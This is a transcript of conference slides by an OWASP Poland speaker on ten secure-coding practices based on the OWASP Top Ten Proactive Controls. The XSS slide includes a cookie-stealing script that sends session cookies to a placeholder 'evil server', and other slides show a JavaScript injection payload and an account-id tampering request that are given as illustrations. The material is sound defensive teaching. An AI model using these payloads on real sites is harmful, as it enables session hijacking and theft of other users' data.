ten commandments of secure coding
TRANSCRIPT
![Page 1: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/1.jpg)
Ten Commandments of Secure CodingOWASP Top Ten Proactive Controls
Mateusz OlejarkaOWASP Poland
![Page 2: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/2.jpg)
Mateusz Olejarka @molejarka
• Senior IT Security Consultant @SecuRing
• Ex-developer• OWASP Poland since 2011
![Page 3: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/3.jpg)
OWASPO = Open
• Docs & tools– free– Creative Commons license– open source
• Build with open collaboration in mind– Each one of you can join
3
![Page 4: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/4.jpg)
OWASP Poland Chapter
• Since 2007• Meetings: Kraków, Poznań, Warszawa• Free entry• Supporters:
![Page 5: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/5.jpg)
4Developers 2014* questionnaire* SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014”• 62% companies do not educate programmers on
application security• >50% companies do not consider security during the
design stage• 73% participants confirmed, that they fixed security
related issues• only 42% confirmed, that they do security testing
before production deployment
![Page 6: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/6.jpg)
OWASP Top10 Risk vsOWASP Top10 Proactive Controls
![Page 7: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/7.jpg)
Disclaimer
• Do not rely your application security on Top 10 *– It is purely educational material– Each application has its own risk profile
![Page 8: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/8.jpg)
Thou shalt parametrize queries
1: Parametrize queries
![Page 9: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/9.jpg)
SQL/LDAP/XML/cmd/…-injection
Easily exploitable• Simple to use tools existDevastating impact#1
Źródło: http://xkcd.com/327/
![Page 10: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/10.jpg)
Best practices
#1 Prepared Statements / Parametrized Queries
#2 Stored Procedures– Watch for exeptions! (eval,dynamic block, etc.)
#3 Escaping– risky!
String newName = request.getParameter("newName");String id = request.getParameter("id");PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
![Page 11: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/11.jpg)
References
• Bobby Tables: A guide to preventing SQL injection
• Query Parameterization Cheat Sheet• SQL Injection Prevention Cheat Sheet• OWASP
Secure Coding Practices Quick Reference Guide
![Page 12: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/12.jpg)
2: Thou shalt encode data
2: Encode Data
![Page 13: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/13.jpg)
XSS
• Site defacement
• Session hijacking
<script>document.body.innerHTML(“Jim was here”);</script>
<script>var img = new Image();img.src="http://<some evil server>.com?” + document.cookie;</script>
![Page 14: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/14.jpg)
Results of missing encoding
• Session hijacking• Network scanning• CSRF prevention bypass• Site defacement (browser)• …• Browser hijack
– vide BeEF
![Page 15: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/15.jpg)
![Page 16: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/16.jpg)
Cross Site Scripting
But when we write output inside pure JavaScript:
<script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script>
trn_recipient=';alert('xss');--
<script> var split='';alert('xss');--
![Page 17: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/17.jpg)
Best practices
• Special character encoding has to be context aware– HTML element – HTML attribute– JavaScript– JSON– CSS / style– URL
![Page 18: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/18.jpg)
References
• XSS (Cross Site Scripting) Prevention Cheat Sheet
• Java Encoder Project• Microsoft .NET AntiXSS Library• OWASP ESAPI• Encoder Comparison Reference Project
![Page 19: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/19.jpg)
Thou shalt validate all inputs
3: Validate All Inputs
![Page 20: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/20.jpg)
Why validate anything?
• Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation
• Validation it is like firewall– Do not protects you agains everything– …but nice to have
![Page 21: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/21.jpg)
Best practices
• Prefer whitelist over blacklist approach,• Use strongly typed fields
– One validator per one data type– Easier to integrate a WAF
• Validation = first line of defence– For exaple type casting prevents injection– But not the only one!
![Page 22: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/22.jpg)
References
• Input Validation Cheat Sheet• Apache Commons Validator• OWASP JSON Sanitizer Project• OWASP Java HTML Sanitizer Project• Google Caja
![Page 23: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/23.jpg)
Thou shalt implement appropriate access controls
4: Implement Appropriate Access Controls
![Page 24: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/24.jpg)
Account history
![Page 25: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/25.jpg)
HTTP requestGET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: accConnection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
GET /services/history/account/45101022350445200448005388 HTTP/1.1
SA-DeviceId: 940109f08ba56a89
SA-SessionId: 826175
Accept: application/json
Host: acc
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Account id change – we get other user data
![Page 26: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/26.jpg)
Best practices
• Server makes a final call!• Default deny• All request must go through access controll
– centralized, easy to use mechanism• Access control rules (policy) should be
separated from code– Not a part of it
![Page 27: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/27.jpg)
if (currentUser.hasRole(“administrator”)) { //pozwol} else { //zabron}
If (currentUser.isPermitted(printPermission)) { //pozwol} else { //zabron}
![Page 28: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/28.jpg)
References
• Access Control Cheat Sheet• Java Authorization Guide with Apache Shiro
– Apache Shiro Authorization features• OWASP PHPRBAC Project
![Page 29: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/29.jpg)
Thou shalt establish identity and authentication controls
5: Establish Identity and Authentication Controls
![Page 30: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/30.jpg)
Example vulnerability
• Authentication with locally stored key (on the machine)
• Process:1. Enter login2. Select key file,enter key password3. We are logged in
https://...../GenerateNewKey
![Page 31: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/31.jpg)
Best practices
• Check access control for the functions allowing to change authentication credentials
• „chain of trust” rule• Watch for session at the border!• Do not limit length and characters to use in
password
![Page 32: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/32.jpg)
References
• Authentication Cheat Sheet• Password Storage Cheat Sheet• Forgot Password Cheat Sheet• Session Management Cheat Sheet
![Page 33: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/33.jpg)
Thou shalt protect data and privacy6: Protect Data and Privacy
![Page 34: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/34.jpg)
Example (at transit)
• SSL covers encryption and authentication• What verifies servers identity?
– Web applications: Browser– Mobile / thick-client / embedded… application:
Application• Common errors
– Missing certificate validation– Brak sprawdzenia certyfikatu lub „łańcucha zaufania”– Missing exception handling
![Page 35: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/35.jpg)
Best practices (in transit)
• TLS• For whole application• Cookies: „Secure” flag • HTTP Strict Transport Security• Strong cipher suites• Chain of trust• Certificate pinning
![Page 36: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/36.jpg)
References (in transit)
• Transport Layer Protection Cheat Sheet• Pinning Cheat Sheet• OWASP O-Saft (SSL Audit for Testers)
![Page 37: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/37.jpg)
Example (at rest)
• Storing password• „Own” SHA1 function
public static String encrypt(byte [] in){
String out = "";for(int i = 0; i < in.length; i++){
byte b = (byte)(in[i] ^ key[i%key.length]);out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b
& 0x0f];} return out;
}
![Page 38: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/38.jpg)
Best practices(at rest)
• Do not reinwent the wheel!– Home-bred ciphers are evil– Own crypto is evil– Only libraries with reputation!
• Strong ciphers in strong modes– ECB is evil– CBC – watch for „padding oracle”
• Good RNG for IV
![Page 39: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/39.jpg)
References
• Google KeyCzar• Cryptographic Storage Cheat Sheet• Password Storage Cheat Sheet
![Page 40: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/40.jpg)
Thou shalt implement logging, error handling and intrusion detection
7: Implement Logging, Error Handling and Intrusion Detection
![Page 41: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/41.jpg)
References
• Logging Cheat Sheet• OWASP AppSensor Project
![Page 42: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/42.jpg)
Thou shalt leverage security features of frameworks and security libraries
8: Leverage Security Features of Frameworks and Security Libraries
![Page 43: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/43.jpg)
Refenences
• PHP Security Cheat Sheet• .NET Security Cheat Sheet• Spring Security• Apache Shiro• OWASP Dependency Check / Track
![Page 44: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/44.jpg)
Thou shalt include security-specific requirements
9: Include Security-Specific Requirements
![Page 45: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/45.jpg)
Building requirements
• Attack scenatios– How threats can reach the objectives?– Requires experience and expertise
• Selection of security controls == REQUIREMENTS
Threat ResultsAttack
scenarios
Who? How? What?
![Page 46: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/46.jpg)
References
• OWASP Application Security Verification Standard Project
• Software Assurance Maturity Model• Business Logic Security Cheat Sheet• Testing for business logic (OWASP-BL-001)
![Page 47: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/47.jpg)
Thou shalt design and architect security in
10: Design and Architect Security In
![Page 48: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/48.jpg)
References
• Software Assurance Maturity Model (OpenSAMM)
• Application Security Verification Standard Project
• Application Security Architecture Cheat Sheet• Attack Surface Analysis Cheat Sheet• Threat Modeling Cheat Sheet
![Page 49: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/49.jpg)
Summary
![Page 50: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/50.jpg)
That was just the Top Ten!
• Each application is different– Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations”
• Few easy steps with big positive impact• Developers education is worth it!
![Page 51: Ten Commandments of Secure Coding](https://reader035.vdocument.in/reader035/viewer/2022062406/55b6e570bb61eb6e688b45c9/html5/thumbnails/51.jpg)
OWASP meetings
• https://www.owasp.org/index.php/Poland • Mailing list• Facebook: OWASP Poland Local Chapter• Twitter: @owasppoland